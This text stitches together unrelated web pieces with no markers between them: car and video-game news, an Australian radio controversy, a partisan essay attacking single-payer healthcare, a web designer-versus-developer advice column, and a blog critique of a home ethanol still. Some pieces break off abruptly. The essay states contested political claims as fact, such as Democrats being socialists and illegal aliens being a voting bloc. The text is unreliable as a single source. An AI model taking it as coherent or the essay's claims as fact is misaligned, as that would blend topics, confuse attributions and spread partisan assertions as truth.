We now have a bunch of b- roll video footage as well as a slew of new photos .
To recap , Mini just celebrated its 50th anniversary on August 26th and revealed a new prototype after months of speculation .
The smart money was on either a coupe or a speedster and strangely enough , it turns out to be a little of both .
Gone is the original Mini Coupe ’s upright windshield and simple fastback design , replaced with a completely reworked upper portion featuring sloping glass and a truncated roof - line with an integrated spoiler edge .
This new two - seater has been engineered to accommodate the strongest engine from the MINI lineup and features a 1.6 - liter turbocharged twin - scroll with 211 hp and 192 lb- ft of torque .
A special overboost function ups the torque to 206 lb - ft .
Source : MINI Cooper
On August 19 , 2009 , Chair Entertainment , a subsidiary of Epic Games and Microsoft delivered the next evolution in downloadable games with the launch of “ Shadow Complex ™ ” exclusively on Xbox LIVE Arcade .
Officially recorded as the most downloaded single - player title in Xbox LIVE Arcade history to date , more than 200,000 people purchased “ Shadow Complex ” in the first week of its release .
“ Congratulations to Chair Entertainment and Epic Games for creating an outstanding game , ” said Scott Austin , director of digitally distributed games at Microsoft .
“ As the capstone title of the second annual Summer of Arcade program , “ Shadow Complex ” has raised the bar for downloadable games .
We ’re proud to offer such high - quality content on Xbox LIVE Arcade . ”
“ We ’re really flattered by all the great things fans and critics have said about Shadow Complex , ” said Dr. Michael Capps , president of Epic Games .
“ Chair ’s goal was to make a gorgeous game with tons of action , addictive challenges , and a great sense of exploration – and they knocked it out of the park .
We ’re so proud to have Shadow Complex join the Epic portfolio .
If you have n’t already downloaded it on Xbox LIVE , give the demo a try . ”
The Kyle & Jackie O Show will return to the airwaves next Tuesday , with a time delay in place , Austereo has announced .
The pair ’s 2Day FM show – which also appears as highlights on the rest of the Austereo network – has been suspended since a few days after a 14 - year - old girl taking part in a lie detector segment said live on air that she had been raped .
A growing public , media and advertiser backlash led to the show – Sydney ’s best rating FM breakfast programme – being taken off air .
Kyle Sandilands was also removed as a judge on Ten ’s Australian Idol .
Austereo said in a statement today :
ADVERTISEMENT
The American Socialist Party ( ASP ) , whose members entertainingly call themselves " Democrats , " is determined to use its control of the executive and legislative branches of government to destroy the private health insurance and healthcare industries in favor of " single - payer " healthcare .
Of course , when government is the single payer that means government - run monopoly .
Average people instinctively understand that monopoly is never in their best interest , but to politicians who will administer and benefit from the monopoly the thinking is apparently " it ’s good to be the monopolist , " as Mel Brooks might say .
Moreover , there is no reason to believe that they will stop there .
If a government - run monopoly is good for healthcare , they will eventually argue , why not food , cars , and other essentials of modern life ?
They are socialists , after all .
Since I always try to keep a step ahead of the bad guys , it will be useful to think through how say , a single - payer grocery industry would work .
Such an exercise will also teach us some lessons about what can be expected of a " single - payer , " government - run healthcare monopoly .
Here ’s my take on how central planning for the new American single - payer grocery industry monopoly would work :
First , all groceries will be paid for by the taxpayers , who are sometimes confused with " government " by the media .
Anyone at any time — even illegal aliens — can walk into a grocery store and walk out with whatever groceries and other items they " need . "
A national government I.D. will be needed so that the state can " track " our grocery purchases with it .
It will be as easy to obtain for illegal aliens as it is for citizens , since illegal aliens are such an important voting block in support of the American Socialist Party .
The government grocery stores will keep track of all food purchases so that they can better administer the state ’s new anti-obesity / mandatory exercise campaign .
The stated purpose of this " campaign " will be to cut healthcare costs by forcing us all into healthier lifestyles ( as defined by the state ) .
With government in charge of health and lifestyle planning , that old saying will be altered to say " a ton of prevention for an ounce of cure . "
Hamiltonu2019s Curse : ... Thomas DiLorenzo Best Price : $ 1.35 ( as of 11:00 EST - Details )
Since the laws of economics have not been repealed , one problem is that since groceries are free , many people will tend to consume far more than is necessary .
Cats and dogs will dine on filet mignon , salmon , and sushi , for example , which might drive the pet food industry out of existence .
Good riddance , some would say .
In economics lingo , there will be an explosion of consumer demand , which will cause a subsequent explosion in costs in most of the food industries ( these are called " increasing cost industries " by economists , since average costs of production tend to increase as they expand ) .
Thus , " free " food will become expensive beyond belief .
This phenomenon is what economists call " the moral hazard problem " of government subsidies .
In response to the government - created explosion of food costs , the government will wage nationwide propaganda campaigns to raise taxes , complete with televised pictures of starving babies , similar to the " feed the children " television commercials that raise charitable donations for starving children in the Third World .
All opposition to the tax increases will be denounced by Nancy Pelosi and her comrades as " Hitler - like , " and worse .
The booboisie will eventually recognize that the food cost explosion ( and the healthcare cost explosion that will inevitably come with single - payer healthcare ) cannot be paid for indefinitely by the Fed chairman ’s announcements of the printing and / or borrowing of another trillion dollars this week , a trillion more next week , etc .
They will demand that " something be done " about the out - of - control costs of food as their tax burden escalates , and the politicians will comply .
Politicians typically have only one response to the cost explosions that their own policies cause : price controls , usually euphemistically called " global budgeting , " " price caps , " or some other deceitful phrase .
The new price controls on food will stimulate consumer demand even further , while stifling food production and supply , since they will take much of the profit out of farming , which for the time being will still be in private hands .
Food shortages are the inevitable result , which of course will call for even more government intervention in the form of a new government food - rationing board , similar to what occurred during World War II when there were price controls on food and many other items .
The more affluent will be able to bribe their way into adequate food purchases , while the poor will simply be out of luck , as they always are whenever government rations anything .
The affluent always have more political influence than the poor .
I would expect the new government grocery stores to be unionized , as the American Socialist Party will change the labor laws to make it mandatory , just as the government did with airport employees after 9/11 .
This will give tremendous clout to the public grocery union since a strike can literally shut down food distribution .
It will essentially transfer much of the power to tax to the public employee grocery union .
Consequently , grocery industry workers will be among the highest paid people in America .
This will be an additional cause of a further cost explosion , which will ignite more tax - increasing campaigns and the demonization of the taxpaying public whenever it resists the additional plunder .
How Capitalism Saved A... Dilorenzo , Thomas J. Best Price : $ 2.18 Buy New $ 7.37 ( as of 12:45 EST - Details )
With no genuine profit - and - loss statements in our new single - payer grocery industry there will be no way in the world to know whether or not agricultural resources are being used efficiently , that is , whether say , a million dollars in grain is turned into food products that are worth more than a million dollars .
When that occurs , there is a profit in the private sector , but the private sector will be only a memory .
Consequently , there will be perpetual economic chaos in the food industry .
We are talking about socialism here , after all .
Since civil service regulations make it all but impossible to fire public employees , we can expect the highly paid food industry bureaucrats to be as inefficient , lazy , and unproductive as any government bureaucrats anywhere .
They will have no incentive to acquire skills that enable them to be more efficient at serving their customers .
Instead , the " skills " they will acquire will be political networking , scheming , and conniving skills .
Politics will be the route to higher pay and perks , not customer service .
Not to mention management , who will all be political appointees whose jobs will be protected by their politician / benefactors .
Bad management , spoiled food , high costs , filthy grocery stores , shortages , and all other costly problems will all be addressed with one strategy : more tax increases and more government demonization of tax resisters .
Since government - run monopolies are , well , monopolies , any competition between the government grocery stores will be strictly controlled or prohibited .
The most likely means of doing this will be to assign each person to a certain neighborhood grocery store , just as the government schools assign everyone to a certain government monopoly school , and as the British nationalized healthcare bureaucracy assigns everyone to a specific hospital .
That way , our new government - run grocery monopoly will have a truly captured audience of " customers . "
Black markets for food will eventually crop up ( no pun intended ) , but they would have to be harshly penalized by fines and even imprisonment for the more egregious offenses , war - on - drugs style .
Single payer means single payer , the government will ominously preach .
Black market gardening will draw resources away from the government - run grocery monopoly , which will be especially harmful to " the children , " the state will inform us .
This is the argument that is always made by the state in response to the creation of private schools , increased homeschooling , or even school voucher proposals , and it will be repeated if there is any competition for the new government grocery monopoly .
Some years ago I discussed this scenario in a class of undergraduate students and asked them if all of these characteristics reminded them of any particular industry in America .
( It ’s how public schools are organized ) .
One student who had grown up in the Republic of China ( Taiwan ) immediately shouted , " Communism ! "
Having grown up in the shadow of Chinese communism he was very familiar with the subject , and he was right , of course .
I ’m sure he would have the same opinion of " single - payer healthcare . "
The Best of Thomas DiLorenzo
Cats and dogs .
Cain and Abel. Designers and developers .
These are just a few of the great historical face - offs .
Designers and developers often seem to come from different planets and have completely different brains .
Developers want a website to work right , designers want it to look right .
A few weeks ago , we explored the main pet peeves that web designers have with web developers , and suggested some solutions for them .
Today , we will discuss the other side of the coin : the five most common gripes that developers have with designers .
PEEVE # 1 : “ Why do designers want to create everything in Flash ? ”
The website is a mere button and some text , but the designer insists on using Flash , even if it triples the downloading time .
Issue
For some designers , using core web technologies ( HTML , CSS and JavaScript ) to create a web page can feel like the death knell of innovation .
They limit their creativity and force them to depend on the developer to realize their vision .
Flash gives designers potentially unlimited design possibilities , and they can retain far more control over the final product , especially if they know ActionScript .
With Flash , designers can choose from any typography , tilt and skew elements , add animation and create special effects that are just impossible in boring ol ’
HTML .
Solution
The first question to ask yourself as the developer is , “ What is the best technical solution to the problem ? ”
It may be core web technologies , or it could be Flash .
Having an open mind is important .
To determine what would work best , sit down with the designer and agree on a list of technical and design requirements for the project .
For example , explore whether the page has to load quickly , use a particular font for marketing purposes , meet accessibility guidelines or have animation .
Once you answer these kinds of questions , you will be better able to weigh the pros and cons of using Flash .
Informing your designer about JavaScript frameworks such as Dojo and jQuery is a good idea .
They may not realize the interactive functionality and special effects that can be achieved with AJAX and DHTML .
PEEVE # 2 : ” Has the designer even heard of HTML CSS ? ”
The designer has created a great design using Photoshop , but the web just does n’t work that way .
Issue
Some designers seem to be willfully ignorant of even the most fundamental aspects of web technology .
This can result in designs that are plain unrealistic or extremely difficult to recreate on the web , that rely too much on images for simple typography or that lead to a subpar user experience .
Solution
CSS is the language of web design , and designers working in the medium really have no excuse not to understand its basics .
I liken this to my earlier work in print design .
I did n’t have to know how to run one of those mammoth industrial printing presses , but I did have to know about trapping , half - tones and CMYK .
I had to understand the fundamentals of the printing process if I wanted to achieve the best results with my designs .
The same is true for web design .
Designers do n’t need to know how a server works , but they should have basic knowledge of line height , padding , background images and the other factors that make up the web development process .
PEEVE # 3 : “ The designer gave me a PSD with 50,000 unnamed layers and no folders ! ”
You download the 50 MB Photoshop document , wait five minutes for it to finally open , start to cut a simple button background and are faced with a wall of unidentified layers in seemingly random order and half of which have been turned off .
Issue
Developers have to keep their documents well organized , or else they wo n’t be effective .
However , if something looks right in the view port of Photoshop , then that ’s often good enough for the designer .
To a developer who is used to object - oriented programming ( OOP ) and a logical order for code , this can be a nightmare !
Solution
Developers are n’t the only ones who get frustrated by disorganized and cluttered PSD files .
As a creative director , I sent back more than one PSD with a request that the designer organize and name all the layers .
Address this issue with the designer as early as possible .
Make it clear that you will need a clean and organized file .
If that is n’t possible ( or the designer is just stubborn ) , one trick for finding the layer of an object is to right / Ctrl+click it in the view port with the Move tool ( the keyboard shortcut is “ v ” ) .
A contextual menu of all of the layers and layer groups under the cursor will appear .
Select the layer that you want and , if the Layer Palette is open , the correct layer will be highlighted .
I also highly recommend asking designers to learn how to use Photoshop ’s Smart Objects .
Smart Objects allow you to collect the various layers that make up an object ( for example , the layers that contain a button ) into a discrete file embedded in the main Photoshop file .
Smart Objects are easy to use and offer several benefits :
They create an “ object - oriented ” Photoshop file , in which repeated elements have a single “ symbol . ”
They can be output as web - ready elements without the need for messy layer - slicing techniques .
They make organizing the PSD easier by reducing the number of layers in the master file .
PEEVE # 4 : “ The designer did n’t accommodate for real - world content . ”
We are using a CMS system that gives the client full control of the content .
The design mockup , though , shows only one line of text for headlines and one paragraph of text for teasers .
The designer expects balanced module heights and columns , but we ca n’t anticipate the amount of copy that will need to fit there .
Issue
Generating Greeked ( or “ Lorem Ipsum ” ) text is a time - honored method of adding realistic - looking content , in the absence of the website ’s final copy .
However , because it ’s not real content , it can lead designers to make erroneous conclusions about the page ’s final design .
Solution
Design comps are static , but real - world web pages have to be fluid and dynamic .
Designers should recognize this and cover all possible scenarios .
This is one of the main limitations of creating static comps : they are not the real thing .
I find it helpful to define the height of areas that will be used to display elements such as headlines and teasers , rather than leaving them open - ended .
This will help you ascertain exactly how much space they will take up in the final design .
PEEVE # 5 : “ The designer expects me to guess what styles ( s ) he has used . ”
The designer hands you a comp with no explanation and expects you to figure out the font family , line heights , colors , widths , padding , borders and margins .
Issue
Unlike creating a mockup in Photoshop , web development is generally not done in a WYSIWYG ( what you see is what you get ) environment .
Rather , the developer assigns specific values for measurements , colors and typography .
Solution
I see this breakdown in communication in a lot of projects ; it highlights one of the biggest differences between “ design ” and “ development . ”
Even if the designer used a template with a predefined grid , the developer often has to eyeball other styles .
Having the designer create a style guide as a deliverable , then , is important .
The style guide will serve as an agreed - upon blueprint for the design and reduce confusion .
Special Bonus Peeve : “ I do n’t need no designer telling me how to program ! ”
The designer wants something done a particular way , whether or not you , the developer , thinks that way is advisable .
Issue
Designers telling developers how to code is just as frustrating as developers telling designers how to do their job .
But the line between designer and developer is often thin , and sometimes both roles are vested in the same person .
If you have clearly defined responsibilities for a project , hearing someone who was not involved in the decision - making process second - guess your conclusions is irritating .
Techniques that seem fine to others on the surface do n’t always fit the programming environment you ’re working in .
Explaining the details of your technical decisions takes precious time , when all you want is for the designer to trust that you have made wise decisions .
Solution
Listen to what the designer has to say about technical alternatives ; you may not have thought of all of them .
More than once , I ’ve been in discussions with designers who brought Solutions to the table that I was not aware of , like the first time I saw jQuery in action .
Remember that you and the designer ( hopefully ) share the same goal of creating the best product possible .
If you keep an open mind and a level - headed approach , you ca n’t go wrong .
Written exclusively for WDD by Jason Cranford Teague .
He offers specialized web consulting services and training sessions .
You can pre-order his new book , Speaking In Styles : The Fundamentals of CSS for Web Designers at Amazon.com .
Which pet peeves do you have with designers ?
We ’d love to know more about this , please share your comments below .
The MicroFueler will use sugar as its main fuel source , or feedstock , along with a specially packaged time - release yeast the company has developed .
Depending on the cost of sugar , plus water and electricity , the company says it could cost as little as a dollar a gallon to make ethanol .
The invention came to my attention about a year ago when a reader referred me to it and asked for my opinion .
At that time the invention had been covered by the New York Times :
I am generally very cautious about calling any business proposition a scam , but when I read a recent article on the E - Fuel MicroFueler , described as " Earth 's First Home Ethanol System " - that term immediately popped into my head .
There were some pretty far - fetched claims made in the article , such as " burning a gallon of ethanol made by his system will produce one - eighth the carbon of the same amount of gasoline " and the inevitable " it could cost as little as a dollar a gallon to make ethanol . "
But in general it was based on the principles of a home - brewing system .
The economics were n't good , though , so they were basing their hopes on the idea that they could " buy inedible sugar from Mexico for as little as 2.5 cents a pound . "
So while the assumptions around their business model were n't grounded in reality , that does n't constitute a scam .
But when the performance of an invention is vastly overstated , the promoters are entering that sort of territory .
Apparently , even the cheap Mexican sugar was n't enough to propel the business model , so they came up with the idea of feeding the machine alcohol so it can produce alcohol :
Strauss to convert beer waste into fuel
GreenHouse Energy ( GHE ) , a three - year - old San Diego company , wants to make the ability to convert the byproduct of brewing beer into a clean - burning fuel as commonplace as brewing a strong pot of coffee .
GHE has created E- fuel MicroFuelers , which convert spent beer yeast and sugar waste into clean - burning ethanol through the processes of fermentation and distillation .
To make their business model run , GHE requires large amounts of organic waste .
Breweries and wineries alike were logical providers , and GHE President Russ Earnshaw knew early on he wanted to work with one brewery in particular .
“ Karl Strauss is a great local brewery , ” Earnshaw said .
“ They have a well - known name and want to be on the cutting - edge of green energy solutions , so we thought it would be great to step in and open up a relationship with them . ”
This would qualify it as more of a gimmick in my opinion , but still not yet to the level that I would label it a scam .
After all , how much economic sense can it make for a brewery to send their waste to local homes for processing ?
It is already at the brewery , so if this makes sense for consumers it would make even more sense ( on many levels ) for the brewery to simply process all of their own waste and sell the ethanol .
So the business model is now that a brewery will send you beer or wine waste , and the person who failed Economics 101 and bought one of these can then use electricity to extract the alcohol .
The unit lists for 10 grand , but they claim the government will gladly pitch in half the cost .
I can't tell you how pleased I am at the thought that the government is making such good use of my tax dollars .
If this is true , then I would expect the government would pay for half of my hypothetical moonshine still - as long as I am pouring the product in my car .
I will mention also that they are setting themselves up for a lawsuit when someone puts too much ethanol in their vehicle and incurs damage .
Their website highlights a study suggesting that the optimal blend for an auto may be E20 or E30 - a strong " Go " signal for customers wondering if that is a good idea .
But the real slide toward scam comes as a result of a story in which a journalist wrote a very misleading story on the unit .
And the reason the story is so misleading is that the journalist was completely out of her element and did n't ask the right questions ( or spot the " wrong " answers ) .
Yet the story ended up in the Business Section of the L.A. Times :
Making fuel at home : Waste wine primes the pump
The subtitle reads : " The MicroFueler makes ethanol out of organic waste in minutes .
It can be installed at individual homes , and companies are eager to supply owners with garbage . "
There is so much wrong in this story , but I am going to focus on some choice excerpts :
It sounds too good to be true :
She could have stopped right there and applied the first rule of Due Diligence 101 .
It is easy to fool people when they are outside of their area of expertise .
If she is not qualified to ask the right questions , then if it sounds too good to be true she probably should have dropped the story or pulled in an expert for an opinion .
But alas , she continued :
The problem with ethanol , [ inventor and CEO Tom ] Quinn said , was energy inefficiency -- not only in the carbon cost of growing , harvesting and transporting the corn that was used to make it , but also in the distillation process that turned it into usable fuel .
Yet ironically this system works best with waste ethanol that was produced using corn ( in a brewery ) , and will be cleaned up with a distillation process that will be less energy efficient than the much larger systems ones in full - scale ethanol plants .
( The percentage of heat lost will be far lower in the large facility ) .
" In the U.S. alone , more than 100 billion gallons of organic fuel is thrown out , " said Quinn , who reached out to ethanol scientist Floyd Butterfield to see if they could collaborate on a system that could make ethanol in a manner that was cost effective and better for the environment .
I would like to see a source for that .
I do not believe it .
Our gasoline demand is around 140 billion gallons per year right now , and I am to believe that we throw away an amount equivalent to over 70 % of what we actually use ?
And I guess that would be this Floyd Butterfield ?
At the link Floyd tells the tale of having converted a truck to run off of pure ethanol .
Once when he was running out of ethanol and was n't going to be able to make it home , he stopped and put 3 gallons of water in and drove the rest of the way home .
This is great news , because the MicroFueler can only produce ethanol at 95 % purity , with 5 % water remaining .
As they say on their technology page , " E - Fuel scientists have experimented with multiple blends of ethanol and water and have determined , contrary to conventional wisdom , small amounts of water improve the efficiency of burning ethanol . "
It occurs to me that they should sell this research to the government and the ethanol industry , which is currently spending lots of money to get that last 5 % of water out .
Here is where the ignorance of the journalist starts to show badly :
The idea was to use organic waste rather than corn to make a product known as cellulosic ethanol .
Although Quinn 's MicroFueler is most effective with wastes that are high in alcohol , ethanol " can be made out of any waste -- lawn clippings , dairy products , old chemicals , cardboard , paper , bruised and discarded apples from the grocery store .
It can be fermented and turned into fuel in minutes , " Quinn said .
First of all , this unit does not make cellulosic ethanol .
To suggest or imply that it does is simply false .
Here is what the company claims on their website :
To further simplify the E - Fuel100 ethanol production for consumers , the MicroFueler supports a variety of organic waste as fuel ( among them are discarded liquids rich in sugar , waste sugar , liquids with residual alcohol , cellulosic materials ** and even algae ** ) .
At the bottom of the page , we see this : ** Additional processing outside of the MicroFueler may be required .
May be ?
So you are telling me that I might be able to throw cellulosic materials or algae into this thing and get ethanol from those feedstocks ?
Well , all I can say is prepare to be sued for fraud , because in my opinion this implication crosses the line into Scam City ( which was already being flirted with as far as I am concerned ) .
So far , only one MicroFueler is up and running .
It was installed in late June at the Pacific Palisades home of Chris Ursitti , CEO of GreenHouse International Inc. , the San Diego firm that is distributing the units and supplying feedstock to those who install MicroFuelers at their homes .
Once you get a few more units out there , you better line up some good lawyers .
You are certainly going to be sued for false advertising .
GreenHouse has contracts with Karl Strauss Brewing Co. , Gordon Biersch Brewing Co. and Sunny Delight Beverages Co. to convert 29,000 tons of their liquid waste using MicroFuelers .
Though Ursitti is the only one now using the system , the plan is for a tanker truck to pick up the companies ' waste and deliver it to home - based MicroFuelers , which convert it to ethanol on site .
MicroFueler owners are charged $ 2 a gallon once they pump out the fuel .
So , let 's think about this again .
A brewing company has a bunch of liquid waste that contains alcohol .
Even though it presently costs them money to dispose of , instead of cleaning up this waste themselves to recover the ethanol , they are going to put it in a tanker truck and haul that waste ( and all that water ! ) to people 's houses and dump it in their MicroFuelers .
The owner of the MicroFueler , having paid $ 10 K to buy one of these things , is now going to pay for electricity , water , and sewage and then pay another $ 2 a gallon for the finished product .
They are then going to put it into their vehicle , hopefully in proportions that do n't ruin their cars .
Wow .
Again , the journalist makes a patently false statement :
Converting expired beer and other liquid wastes into cellulosic ethanol takes minutes and uses three kilowatt - hours of electricity to produce one gallon of fuel .
How about some voodoo economics ?
The following , combined with the cellulosic misdirection , are enough to convince me that consumers are being seriously misled :
Factoring in the $ 5,000 federal tax credit , an annual household fuel consumption of 2,080 gallons and a $ 2 charge a gallon , GreenHouse estimates the average consumer payback time is about two years .
Some of the assumptions in their business plan are simply amazing .
First , their estimate of 2,080 gallons is almost double the real annual household fuel consumption .
There are an estimated 112 million households in the U.S. , and our total gasoline consumption is about 140 billion gallons .
That is 1,250 gallons of gasoline per household .
But because of the lower energy density , one would have to replace that gasoline with around 1,800 gallons of ethanol ( actually about 1,900 since this ethanol contains 5 % water ) .
Further , they apparently also made the assumption that people are going to run E100 in their cars to justify that two - year payback claim .
But their two key assumptions are both wrong .
They admit that you are going to spend $ 10,000 on the unit , yet they assure that you will get a $ 5,000 tax credit ( hey , they have n't steered us wrong yet , have they ? ) and then you are going to pay $ 2 per gallon plus electricity to produce each gallon .
So over the course of 2 years the average household would pay $ 5,000 ( plus another $ 5,000 from the taxpayer ) plus $ 3,800 ( 1,900 gallons at $ 2/gal ) plus another $ 1710 of electricity ( again , taking their word that it is only 3 kWh of electricity per gallon , and using $ 0.15 / kWh ) for 3,800 gallons of ethanol to replace 2,500 gallons of gasoline .
Today 's average retail price of gasoline is $ 2.64 .
So in two years an average household would pay $ 6,600 for gasoline .
The total price over two years via this ethanol route ( and I am assuming free feedstock and value for your labor ) is $ 15,510 .
But if they are correct and we taxpayers get to kick in $ 5,000 , then the cost is only $ 10,510 .
So much for a two - year payback .
Again , this appears to be for those who failed Economics 101 , and is being helped by a journalist who failed Due Diligence 101 .
I must say that things have certainly changed a lot since Quinn and Butterfield were featured in the New York Times a year ago .
At that time the unit was going to be fed sugar and was going to produce ethanol at a cost of only $ 1/gal .
Quinn claimed at that time " It ’s going to cause havoc in the market and cause great financial stress in the oil industry . "
Now a year later the unit prefers to be fed alcohol so it can produce alcohol , will cost $ 2/gal , and will produce almost as much carbon as one would produce from burning gasoline .
--------------------------------------
An E - Fuel MicroFueler Dealer Responds
After I wrote this essay , I went back and searched through my Gmail to see when I had first heard about the E - Fuel MicroFueler .
It turns out that about a year ago a regular reader of my blog - and someone I had exchanged a number of e-mails with - sent me the first bit of information and asked for my opinion .
He told me at that time that he had become a dealer of these systems .
At the time , the idea was to use sugar as the feedstock .
I made a number of comments to him , including my concern that the capital costs alone were too high to make the unit economical .
I said that I felt like they would need to get capital costs down by 2/3rds , and I questioned several assumptions in the economics .
Further , I flagged up a concern that people who could n't program their VCRs would be expected to produce ethanol in their garage .
On the other hand , I did favor the idea of localized production of fuel ( and still do ) .
Following the essay on my blog - Another Journalist Fails Due Diligence 101 - in which I pulled no punches , we exchanged several e-mails .
I told him that I felt like what was being presented about the MicroFueler 's capabilities bordered on fraud .
In response , he said he wanted to clarify a number of points raised in the L.A .
Times article that I addressed .
Since he is not authorized to speak on behalf of E - Fuel , he will not be identified and this will be his opinion - and not the official company position .
One of my core principles is to allow people to respond to my criticisms , so in the interest of fairness , I present excerpts of his response to me .
On the topic of the government picking up half the cost , he wrote :
Section 30C of the US Internal Revenue Code ( as amended by the Stimulus Act ) provides an income tax credit of 50 % ( up to $ 50,000 ) for a taxpayer to install “ Alternative Fuel Vehicle Refueling Equipment ” as long as the fuel is used in a “ trade or business ” .
Individuals can qualify for a credit of up to $ 2,000 .
This credit applies to commercial E - 85 pumps , natural gas refueling equipment , hydrogen , biodiesel , and yes , even MicroFuelers .
The credit also applies to other “ turn - key ” ethanol fuel production / dispensing solutions .
The same government that provides these incentives is the same one that gives incentives to the petroleum industry for exploration , infrastructure , research & development , etc .
Fair is fair .
If individuals qualify for $ 2,000 , then that puts the out of pocket cost at $ 8,000 - and not the $ 5,000 that I have seen mentioned again and again .
Regarding my comment about people being trusted to put the correct amounts of ethanol in their vehicles , he wrote :
There was a study by the University of North Dakota that looked at the ability of unmodified non -flex fuel vehicles to run on ethanol / gasoline blends .
The study showed that these vehicles could run quite well on high - level blends such as E - 50 , E - 60 , etc .
The study also looked at fuel economy when using these various blends and concluded that blends of E - 20 or E - 30 might well be the “ optimal ” blend in terms of overall fuel economy for non-flex fuel vehicles , but the results tended to be different for each make / model / year vehicle tested .
“ Optimal ” in the real world translates ( and this is very important ) into two things :
1. Lowest net cost per mile ( including vehicle manufacture & upkeep )
2. Lowest net “ well to wheel ” emissions per mile ( including vehicle manufacture & upkeep ) Optimal Ethanol Blend - Level Investigation Unfortunately , it did n’t address the question of vehicle longevity , but we have many real - world data points that support our position that ethanol is unlikely to cause any problems .
We know that most vehicles built after 1989 have parts that are ethanol compatible ( fuel pumps , fuel injectors , fuel lines , etc ) .
In fact , if you compare part numbers between today ’s “ flex fuel ” and “ non-flex fuel ” vehicles , you ’ll find the exact same part number used in both applications .
There is a lot of fear , uncertainty , and doubt about whether ethanol can be used in non-flex fuel vehicles – but the fact is that we ’ve been using high - level ethanol blends ( up to E100 ) in a number of unconverted non-flex fuel vehicles with no problems except the occasional “ Check Engine ” light ... and the only reason the Check Engine light comes on is because the on - board ECU thinks that the fuel system is putting too much fuel into the engine so it assumes there is a problem when , in fact , there really is n’t .
It ’s just that the ECU was never programmed to take the possibility of using ethanol ( lower energy density ) into account .
In these cases , the “ Check Engine ” light is a false indication of a non-existent problem .
I am familiar with the University of North Dakota study .
It was paid for by the American Coalition for Ethanol .
I think we would agree that if an anti-ethanol result was found as a result of research funded by the American Petroleum Institute , ethanol proponents would n't accept that at face value .
The study has been widely spun as showing that an optimal ethanol blend was E20 or E30 .
But I looked at the report , and previously commented on it at TOD .
Here were some of my comments on this paper :
I took some time to review this paper again .
This is what I see from the ethanol tests .
Look at Figures 10 - 13 .
Here is the reality of the tests : Figure 10 .
2007 Toyota Camry , 2.4 - L engine - 6 of 7 tests show worse fuel efficiency on an ethanol blend .
There is one apparent outlier , which was the basis for the claims .
( And it looks like a classic outlier , with almost all of the other points falling as predicted ) .
Figure 11 . 2007 Chevrolet Impala ( non- flex fuel ) , 3.5 - L engine - 5 of 5 tests show worse fuel efficiency on an ethanol blend .
Figure 12 . 2007 Chevrolet Impala ( flex fuel ) , 3.5 - L engine - 8 tests , 2 show better fuel efficiency , 2 show the same , and 3 show worse fuel efficiency on an ethanol blend .
Figure 13 .
2007 Ford Fusion , 2.3 - L engine - 4 of 5 tests show worse fuel efficiency on an ethanol blend .
There is one apparent outlier .
So , what can we conclude ?
Of 25 data points , 18 confirm that the fuel economy is worse on an ethanol blend .
That is 72 % of the tests , and these tests were paid for by the ethanol lobby ( which is why I suspect the results were spun as they were ) .
The outliers are interesting enough for further investigation , but you have vastly overstated the test results .
In reality , if you pulled the results out of a bag , you have only a 28 % chance of improving your fuel efficiency on the basis of any particular test .
Further , the outlier did n't always occur at the same percentage , which would be quite problematic even if the result is confirmed .
Note : A reader just pointed me to an NREL study that attempted to replicate the results of the North Dakota study and refuted it ( vindicating my skepticism of the results ) :
Effects of Intermediate Ethanol Blends on Legacy Vehicles and Small Non-Road Engines
The key findings :
• All 16 vehicles exhibited a loss in fuel economy commensurate with the energy density of the fuel .*
• Limited evaluations of fuel with as much as 30 % ethanol were conducted , and the reduction in miles per gallon continued as a linear trend with increasing ethanol content .
* This result was expected because ethanol has about 67 % of the energy density of gasoline on a volumetric basis .
Given the number of times ethanol proponents have touted this test , this will be the subject of an upcoming post .
On the L.A . Times article itself , and my claim that the author had been duped :
“ Duped ” might be a bit strong , but there were certainly a few problems with the article .
I ’m not sure if Tom / Chris misspoke or if they were misquoted ( I was n’t there ) , but the inaccuracies should have been identified and cleared - up before the article went to press .
Incorrect ?
Perhaps in some ways .
Misleading ?
Maybe .
Intentionally misleading ( fraud ) ?
No ... I ’m confident that there was no intent by E - Fuel or GreenHouse to be misleading .
I think it ’s unfair to expect any journalist to have the same level of technical knowledge and industry experience that we have , so I ’m prepared to live and let live when an article does n’t get everything exactly right .
The fact is that nobody “ lied ” here , and there ’s really no way to control what gets printed .
No journalist in the world would allow us to review the article before it goes to print .
I agree that someone with more experience could have handled the interviews or at least reviewed the article before it went to press .
And perhaps an “ interview ” is n’t the best way to present the concepts that were discussed .
Maybe a “ press sheet ” or “ whitepaper ” would be more appropriate .
We ( the biofuels industry in general ) need to be careful to properly manage customer expectations because , ultimately , failure to do so could seriously undermine our credibility .
Regarding my comment that a big ethanol refinery would be more efficient :
Energy efficiency of huge biorefineries is n’t going to be much different than in the MicroFueler .
It takes a certain amount of energy to distill no matter what quantities we ’re talking about .
Take a look at Floyd ’s 1982 design and then look at the MicroFueler design and you ’ll see it ’s pretty well thought out .
Where “ the big boys ” have a definite advantage is there economies of scale with respect to capital costs .
Where we have a huge advantage is the cost of feedstock , carbon balance , and the ( near ) elimination of the whole petroleum distribution system .
I disagree with that .
A smaller purification system is going to suffer heat losses to a much greater degree .
It is inevitable .
You see it all the time when trying to run a laboratory column to simulate a production column .
Efficiencies are n't nearly as good because of the higher relative heat losses .
Regarding the comment that 100 billion gallons of fuel are thrown away :
Misquoted or misspoken .
He probably meant to say that the US is sitting on about 100 billion gallons worth of cellulosic biomass on a sustainable , annual basis .
That ’s the USDA / DOE “ Billion Ton ” study .
There ’s a fine line between “ thrown out ” and “ not utilized ” .
Then there ’s all the stuff that we ’re paying to haul away to landfills ( another 6 - 10 billion gallons worth ) .
Tom knows the difference , but somehow the two thoughts got combined into a single statement .
We exchanged a number of e-mails regarding the claims around adding water to ethanol to improve the engine efficiency .
I have seen some references to that , but I have n't been able to find actual results .
( See this article , for instance ) .
My comment was that the results may have been spun like the University of North Dakota study cited above .
But one thing that I told him I do n't believe is credible is that a person was running out of fuel and added 3 gallons of water to their tank to get home ( see the previous story for that example ) .
It is possible that a vehicle running on ethanol - and with a pretty full tank - could " tolerate " that much water .
But this much is true .
It takes a lot of energy and capital to get that last 5 % of water out of ethanol that is produced .
Cars can run on ethanol that contains water ( hydrous ethanol ) , albeit at a lower efficiency ( which is why the water is removed ) .
Brazil runs some of their cars on hydrous ethanol .
But the claim that this improves the efficiency is pretty far - fetched , in my opinion .
One of the articles I recently read stated that the water lowered the combustion temperature , thus increasing the efficiency .
But if you look at the equation for efficiency of an engine , a lower combustion temperature will normally result in a lower efficiency .
Regardless , I do n't put much faith in highly counter - intuitive results until they have been well - replicated ( see ' cold fusion ' ) .
